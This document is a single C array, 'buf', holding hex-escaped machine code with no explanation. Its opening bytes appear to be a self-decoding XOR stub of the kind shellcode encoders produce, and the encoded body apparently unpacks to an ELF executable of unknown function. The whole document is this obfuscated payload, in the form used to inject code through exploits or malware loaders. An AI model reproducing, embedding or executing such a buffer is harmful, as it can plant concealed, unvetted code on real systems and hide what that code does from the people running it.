unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xb8\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x55\x09\x7c"
"\xce\x52\xd4\x7d\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x2b"
"\x4c\x0e\x88\x51\xd5\x7c\x2a\x2a\x4c\x30\x88\x50\xd5\x7c"
"\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x6a\x4c\x30\x88\x50"
"\xd5\x7c\x2a\x2a\x4c\x30\x88\x10\xd5\x7c\x2a\x2a\x4c\x70"
"\x88\x55\xd5\x7e\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x2a"
"\x4c\x30\x88\x50\xd5\x7c\x2a\x2a\x4c\x30\x88\x50\xd5\x7c"
"\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x2a\x4c\x30\x88\x50"
"\xd5\x7c\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x2a\x4c\x30"
"\x88\x50\xd5\x7c\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x2b"
"\x4c\x30\x88\x51\xd5\x7c\x2a\x2c\x4c\x30\x88\x50\xd5\x7c"
"\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\xaa\x4d\x30\x88\x50"
"\xd5\x7c\x2a\x26\x4c\x30\x88\x50\xd5\x7c\x2a\x2a\x4c\x30"
"\x88\x50\xd5\x7c\x2a\x3a\x4c\x30\x88\x50\xd5\x7c\x2a\x2a"
"\x4c\x30\x88\x50\xd5\x7c\x2a\x2d\x4c\x30\x88\x53\xd5\x7c"
"\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x2a\x4c\x30\x88\x50"
"\xd5\x7c\x2a\xba\x4d\x30\x88\x50\xd5\x7c\x2a\x0b\x4c\x30"
"\x88\x50\xd5\x7c\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x2b"
"\x4c\x30\x88\x50\xd5\x7c\x2a\x2a\x4c\x30\x88\x50\xd5\x7c"
"\x2a\x3b\x4c\x30\x88\x52\xd5\x7c\x2a\x2a\x4c\x30\x88\x50"
"\xd5\x7c\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\xea\x4d\x30"
"\x88\x50\xd5\x7c\x2a\x4a\x4c\x30\x88\x50\xd5\x7c\x2a\x2e"
"\x4c\x30\x88\x53\xd5\x7c\x2a\x22\x4c\x30\x88\x50\xd5\x7c"
"\x2a\x32\x4c\x30\x88\x50\xd5\x7c\x2a\x33\x4c\x30\x88\x53"
"\xd5\x7c\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x2a\x4c\x30"
"\x88\x50\xd5\x7c\x2a\x0a\x4e\x30\x88\x50\xd5\x7c\x2a\x33"
"\x4c\x30\x88\x50\xd5\x7c\x2a\x2a\x4c\x30\x88\x50\xd5\x7c"
"\x2a\x2b\x4c\x30\x88\x50\xd5\x7c\x2a\x2a\x4c\x30\x88\x50"
"\xd5\x7c\x2a\x92\x4d\x30\x88\x50\x6e\x7c\x2a\x2a\x4c\xfd"
"\x08\x50\xd5\x7c\x2a\x2a\x62\x44\xed\x28\xa1\x7c\x04\x59"
"\x24\x43\xfc\x22\xa1\x1d\x48\x2a\x62\x43\xf1\x3d\xa1\x1d"
"\x48\x2a\x62\x43\xfc\x22\xa1\x1d\x48\x2a\x4c\x30\x88\x50"
"\xd5\x7c\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x2a\x4c\x30"
"\x88\x50\xd5\x7c\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x2a"
"\x4c\x30\x88\x50\xd5\x7c\x2a\x2b\x4c\x30\x88\x54\xd5\x8d"
"\xd5\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x2a\x4c\x30\x88\x50"
"\xd5\x7c\x2a\x2a\x4c\x30\x88\x53\xd5\x7d\x2a\x2a\x4c\x30"
"\x88\x50\xd5\x7c\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x38"
"\x4c\x30\x88\x40\xd5\x7d\x2a\x2a\x4c\x30\x88\x50\xd5\x7c"
"\x2a\x2a\x4c\x30\x88\x50\xd5\x7c\x2a\x2a\x62\x1e\xa7\x31"
"\xa6\x11\x1c\x1e\x63\x51\xfb\x3d\xe5\x4d\x04\x59\x4c\x6f"
"\xfb\x24\xb4\x0e\x5e\x2a\x4c\x30\x88\x50\xd5\x7c\x2a";
